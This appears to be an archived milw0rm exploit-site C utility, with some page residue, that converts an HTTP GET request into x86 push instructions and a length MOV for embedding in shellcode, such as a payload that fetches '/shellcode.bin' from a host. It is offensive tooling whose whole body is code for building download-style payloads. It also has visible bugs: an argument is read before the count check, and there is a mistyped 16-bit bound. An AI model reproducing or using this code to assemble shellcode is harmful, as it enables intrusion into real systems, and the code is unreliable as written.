182 lines
No EOL
3.5 KiB
C
182 lines
No EOL
3.5 KiB
C
/*
|
|
* gen_httpreq.c, utility for generating HTTP/1.x requests for shellcodes
|
|
*
|
|
* SIZES:
|
|
*
|
|
* HTTP/1.0 header request size - 18 bytes+
|
|
* HTTP/1.1 header request size - 26 bytes+
|
|
*
|
|
* NOTE: The length of the selected HTTP header is stored at EDX register.
|
|
* Thus the generated MOV instruction (to EDX/DX/DL) is size-based.
|
|
*
|
|
* - izik@tty64.org
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <unistd.h>
|
|
#include <stdarg.h>
|
|
#include <string.h>
|
|
|
|
#define X86_PUSH \
|
|
0x68
|
|
|
|
#define X86_MOV_TO_DL(x) \
|
|
printf("\t\"\\xb2\\x%02x\"\n", x & 0xFF);
|
|
|
|
#define X86_MOV_TO_DX(x) \
|
|
printf("\t\"\\x66\\xba\\x%02x\\x%02x\"\n", \
|
|
(x & 0xFF), ((x >> 8) & 0xFF));
|
|
|
|
#define X86_MOV_TO_EDX(x) \
|
|
printf("\t\"\\xba\\x%02x\\x%02x\\x%02x\\x%02x\"\n", \
|
|
(x & 0xFF), ((x >> 8) & 0xFF), ((x >> 16) & 0xFF), ((x >> 24) & 0xFF));
|
|
|
|
void usage(char *);
|
|
int printx(char *fmt, ...);
|
|
|
|
int main(int argc, char **argv) {
|
|
|
|
if (argc < 2) {
|
|
usage(argv[0]);
|
|
return -1;
|
|
}
|
|
|
|
if (argv[2][0] != '/') {
|
|
|
|
fprintf(stderr, "filename must begin with '/' as any sane URL! (e.g. /index.html)\n");
|
|
|
|
return -1;
|
|
}
|
|
|
|
if (!strcmp(argv[1], "-0")) {
|
|
|
|
return printx("GET %s HTTP/1.0\r\n\r\n", argv[2]);
|
|
}
|
|
|
|
if (!strcmp(argv[1], "-1")) {
|
|
|
|
if (argc != 4) {
|
|
|
|
fprintf(stderr, "missing <host>, required parameter for HTTP/1.1 header! (e.g. www.tty64.org)\n");
|
|
|
|
return -1;
|
|
}
|
|
|
|
return printx("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n", argv[2], argv[3]);
|
|
}
|
|
|
|
fprintf(stderr, "%s: unknown http protocol, try -0 or -1\n", argv[1]);
|
|
|
|
return -1;
|
|
}
|
|
|
|
/*
|
|
* usage, display usage screen
|
|
* * basename, barrowed argv[0]
|
|
*/
|
|
|
|
void usage(char *basename) {
|
|
|
|
printf(
|
|
"usage: %s <-0|-1> <filename> [<host>]\n\n"
|
|
"\t -0, HTTP/1.0 GET request\n"
|
|
"\t -1, HTTP/1.1 GET request\n"
|
|
"\t <filename>, given filename (e.g. /shellcode.bin)\n"
|
|
"\t <host>, given hostname (e.g. www.tty64.org) [required for HTTP 1.1]\n\n",
|
|
basename);
|
|
|
|
return ;
|
|
}
|
|
|
|
/*
|
|
* printx, fmt string. generate the shellcode chunk
|
|
* * fmt, given format string
|
|
*/
|
|
|
|
int printx(char *fmt, ...) {
|
|
va_list ap;
|
|
char buf[256], pad_buf[4], *w_buf;
|
|
int pad_length, buf_length, i, tot_length;
|
|
|
|
memset(buf, 0x0, sizeof(buf));
|
|
|
|
va_start(ap, fmt);
|
|
vsnprintf(buf, sizeof(buf), fmt, ap);
|
|
va_end(ap);
|
|
|
|
buf_length = strlen(buf);
|
|
|
|
printf("\nURL: %s\n", buf);
|
|
printf("Header Length: %d bytes\n", buf_length);
|
|
|
|
for (i = 1; buf_length > (i * 4); i++) {
|
|
pad_length = ((i+1)*4) - buf_length;
|
|
}
|
|
|
|
printf("Padding Length: %d bytes\n\n", pad_length);
|
|
|
|
tot_length = buf_length + pad_length;
|
|
|
|
w_buf = buf;
|
|
|
|
if (pad_length) {
|
|
|
|
w_buf = calloc(tot_length, sizeof(char));
|
|
|
|
if (!w_buf) {
|
|
|
|
perror("calloc");
|
|
return -1;
|
|
}
|
|
|
|
i = index(buf, '/') - buf;
|
|
|
|
memset(pad_buf, 0x2f, sizeof(pad_buf));
|
|
|
|
memcpy(w_buf, buf, i);
|
|
memcpy(w_buf+i, pad_buf, pad_length);
|
|
memcpy(w_buf+pad_length+i, buf+i, buf_length - i);
|
|
}
|
|
|
|
for (i = tot_length - 1; i > -1; i-=4) {
|
|
|
|
printf("\t\"\\x%02x\\x%02x\\x%02x\\x%02x\\x%02x\" // pushl $0x%02x%02x%02x%02x\n",
|
|
X86_PUSH, w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i], w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i]);
|
|
}
|
|
|
|
if (pad_length) {
|
|
|
|
free(w_buf);
|
|
}
|
|
|
|
//
|
|
// The EDX register is assumed to be zero-out within the shellcode.
|
|
//
|
|
|
|
if (tot_length < 256) {
|
|
|
|
// 8bit value
|
|
|
|
X86_MOV_TO_DL(tot_length);
|
|
|
|
} else if (tot_length < 655356) {
|
|
|
|
// 16bit value
|
|
|
|
X86_MOV_TO_DX(tot_length);
|
|
|
|
} else {
|
|
|
|
// 32bit value, rarely but possible ;-)
|
|
|
|
X86_MOV_TO_EDX(tot_length);
|
|
|
|
}
|
|
|
|
fputc('\n', stdout);
|
|
|
|
return 1;
|
|
}
|
|
|
|
// milw0rm.com [2006-10-22]
|